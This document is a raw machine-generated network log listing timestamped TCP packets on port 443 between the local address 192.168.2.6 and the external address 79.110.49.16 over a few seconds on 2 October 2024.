                                                                                                                                                Oct 2, 2024 06:25:28.836905003 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:28.924221039 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:28.924237967 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:28.924331903 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:28.924390078 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:28.924433947 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:28.925826073 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:28.925843000 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:28.925915956 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:28.925926924 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:28.925966024 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:29.012288094 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.012317896 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.012454033 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:29.012497902 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.012547016 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:29.013430119 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.013448000 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.013531923 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:29.013545990 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.013583899 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:29.014713049 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.014729977 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.014801025 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:29.014811993 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.014853954 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:29.086765051 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.086796045 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.086905956 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:29.086940050 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.086987019 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:29.100935936 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.100955009 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.101169109 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:29.101212025 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.101263046 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:29.101835012 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.101859093 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.101914883 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:29.101933002 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.101965904 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:29.101988077 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:29.102721930 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.102739096 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.102824926 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:29.102840900 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.102893114 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:29.161514997 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.161533117 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.161598921 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:29.161637068 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.161655903 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:29.161676884 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:29.162175894 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.162193060 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.162249088 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.162249088 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:29.162260056 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.162295103 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:29.162337065 CEST4434973179.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.162379026 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:29.201455116 CEST49731443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:29.472002983 CEST49734443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:29.472034931 CEST4434973479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:29.472110987 CEST49734443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:29.472415924 CEST49734443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:29.472429037 CEST4434973479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:30.312175035 CEST4434973479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:30.313323975 CEST49734443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:30.313349962 CEST4434973479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:30.589261055 CEST4434973479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:30.589288950 CEST4434973479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:30.589307070 CEST4434973479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:30.589400053 CEST49734443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:30.589416981 CEST4434973479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:30.589508057 CEST49734443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:30.676412106 CEST4434973479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:30.676439047 CEST4434973479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:30.676562071 CEST49734443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:30.676562071 CEST49734443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:30.676594973 CEST4434973479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:30.676745892 CEST49734443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:30.677818060 CEST4434973479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:30.677835941 CEST4434973479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:30.677905083 CEST49734443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:30.677917957 CEST4434973479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:30.677974939 CEST49734443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:30.764940023 CEST4434973479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:30.764965057 CEST4434973479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:30.764993906 CEST4434973479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:30.765027046 CEST49734443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:30.765041113 CEST4434973479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:30.765149117 CEST49734443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:30.765149117 CEST49734443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:30.765152931 CEST4434973479.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:30.765275002 CEST49734443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:30.765861034 CEST49734443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:30.781400919 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:30.781435013 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:30.781588078 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:30.782135963 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:30.782145023 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.419300079 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.423567057 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:31.423592091 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.684757948 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.684833050 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.684849024 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.684998989 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:31.685022116 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.685075045 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:31.769731998 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.769762993 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.769892931 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:31.769912958 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.770067930 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:31.772180080 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.772196054 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.772300005 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:31.772308111 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.772478104 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:31.855606079 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.855628967 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.856928110 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.856973886 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:31.856991053 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.857023001 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.857038975 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:31.858582020 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.858597040 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.858622074 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:31.858675957 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:31.858676910 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:31.858685017 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.908866882 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:31.941836119 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.941860914 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.941941023 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:31.941941023 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:31.941963911 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.942049980 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:31.942457914 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.942473888 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.942533016 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:31.942539930 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.943362951 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.943382025 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.943418980 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:31.943419933 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:31.943430901 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.943458080 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:31.944192886 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:31.944648981 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.944663048 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.944834948 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:31.944839954 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.945538998 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:31.945595026 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.945609093 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.946212053 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:31.946218014 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:31.946270943 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.009938002 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.009958029 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.010023117 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.010039091 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.010071039 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.010082006 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.019046068 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.019066095 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.019124985 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.019134998 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.019169092 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.028147936 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.028167009 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.028249025 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.028249025 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.028259039 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.028296947 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.028513908 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.028528929 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.028563976 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.028568029 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.028594017 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.028609037 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.029411077 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.029433012 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.029467106 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.029470921 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.029504061 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.029516935 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.029967070 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.029992104 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.030035019 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.030039072 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.030070066 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.030086994 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.030705929 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.030719995 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.030778885 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.030785084 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.030826092 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.031805992 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.031827927 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.031871080 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.031874895 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.031903982 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.031914949 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.096035004 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.096064091 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.096128941 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.096147060 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.096215963 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.105101109 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.105125904 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.105182886 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.105192900 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.105233908 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.114583969 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.114614010 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.114701033 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.114711046 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.114753962 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.115219116 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.115241051 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.115283012 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.115288019 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.115320921 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.115334988 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.115679979 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.115695000 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.115768909 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.115773916 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.115971088 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.116189003 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.116206884 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.116255999 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.116260052 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.116288900 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.116317987 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.119415045 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.119436026 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.119477034 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.119482994 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.119520903 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.119538069 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.119925976 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.119941950 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.119976044 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.119980097 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.120012999 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.120027065 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.182512045 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.182535887 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.182583094 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.182595968 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.182610035 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.182679892 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.191349030 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.191365004 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.191416979 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.191423893 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.191436052 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.191462994 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.200877905 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.200896978 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.200946093 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.200953007 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.200975895 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.201004982 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.201527119 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.201545000 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.201586008 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.201591015 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.201616049 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.201627016 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.202162027 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.202179909 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.202229023 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.202234983 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.202265978 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.202303886 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.202519894 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.202536106 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.202579975 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.202585936 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.202596903 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.202625036 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.203381062 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.203402042 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.203449965 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.203454971 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.203525066 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.203876019 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.203891993 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.203937054 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.203943014 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.203960896 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.203982115 CEST49736443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:32.268863916 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.268882990 CEST4434973679.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:32.268943071 CEST49736443192.168.2.679.110.49.16
